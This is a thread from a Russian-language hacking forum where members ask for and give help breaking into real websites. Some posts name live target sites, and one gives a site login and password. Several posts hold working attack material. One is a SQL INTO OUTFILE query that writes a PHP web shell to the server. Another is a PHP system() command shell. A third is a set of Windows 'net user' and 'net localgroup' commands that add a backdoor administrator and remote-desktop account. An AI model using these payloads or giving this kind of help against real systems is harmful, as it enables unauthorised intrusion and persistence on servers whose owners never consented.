Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    так где там админка не запороленая? =)
     
  2. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    выложить можно , но опасно :) и не буду, ибо там все просто, надо тока знать имя папки получается,и умееш ли ты с ним работать? :)
     
    _________________________
    1 person likes this.
  3. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    хм.
    /ru/admin
    /em/admin
    не открывает ,хотя маднет кричит что они есть =)
    а как ни странно
    en/admin,которой в маднете нет, выдаёт окно для ввода логина/паса,но она запаролена

    просвети,буду уметь работать )
     
  4. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    ну вот админка но она запаролена...
    http://www.terratour.ru/ru/login/login.php
     
  5. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Я что-то не пойму, РОА заняться нечем что-ли? В правилах темы написано по русски что шеллы в паблике запрещены, мы их долго тереть будем?
     
    2 people like this.
  6. Totgeliebt

    Totgeliebt New Member

    Joined:
    20 Oct 2009
    Messages:
    37
    Likes Received:
    1
    Reputations:
    0
    Фото альбомы > >



    Дата: 01.01.1970
    Добавлено:
    Размер: x пикселов

    Warning: filesize() [function.filesize]: stat failed for images/photoalbum/album_/ in /home/gamer/public_html/photogallery.php on line 68
    Рахмер файла: Bytes
    Комментариев: 0
    Рейтинг: Пусто
    Количество просмотров:
    Посмотрите есть тут что плз :)
    P.S Ногами не пинать, я чайничек)
     
  7. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    Залил на сайт шелл, но доступ к индексу и другим файлам не имею,то есть не могу удалить,редак. и др. чмод 666, меняю на 777 - не меняется, помогите пж.



    спс.
     
    #10387 wkar, 1 Dec 2009
    Last edited: 1 Dec 2009
  8. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    хы,только рут чмоды раздавать может =) повышай привилегии.
     
  9. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    да-да сейчас я покажу свои экстрасенсорные способности и угадаю сайт!!!
    У тебя тут есть путь, ты доволен???
     
  10. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    поясните пожалуйста что такое "не запароленный пма под рутом "
     
  11. Totgeliebt

    Totgeliebt New Member

    Joined:
    20 Oct 2009
    Messages:
    37
    Likes Received:
    1
    Reputations:
    0
    тссс успокойся :) Вот посмотри пожалуйста
    http://la2.sz.ru/photogallery.php?photo_id=1
    Вот пользователь для проверки:
    логин: caak111
    пароль: 1q2w3e4r
     
  12. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    как "чистым" (не через инъект) скуль запросом залить шелл на сервер?
     
  13. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    SQL - пользователь root не имеет пароля.

    Так же, как и через инъект...

    Code:
    SELECT '<?=system($_GET["cmd"])>' FROM table_name INTO OUTFILE '/var/www/shell.php'
     
  14. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50

    пма-phpmyadmin я так понял...
     
  15. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    Выкидывает
    #1 - Can't create/write to file 'D:www uimgc.php' (Errcode: 22)
     
  16. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    user - root
     
  17. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    67
    Reputations:
    34
    Parse error: syntax error, unexpected '<' in D:\www\jo.php on line 2 как исправить?
     
  18. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Вообще то это было сделано для того, чтобы ты сам поправил, но ладно...

     
  19. apekoff

    apekoff New Member

    Joined:
    12 Mar 2009
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    Люди , ситауция -
    залил через скуль шел на сайт .
    сайт под виндовс .
    при создании файла с содержимым - "<?php system($_GET['cmd']); ?>" и вызовом функции site.com/cmd.php?cmd=dir
    ничего не отображается..что же делать ? как по рутать ..
    Есть доступ и права на запись ко всему диску С:
    думал сделать нечто такое --
    net user Attacker 12345 /add

    net localgroup Administrators Attacker /add

    net localgroup Remotedesktopuser Attacker /add

    ,.. но вот не задача цмд не работает ..Что делоть? :confused:
     
  20. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    safe mode on?
     
Thread Status:
Not open for further replies.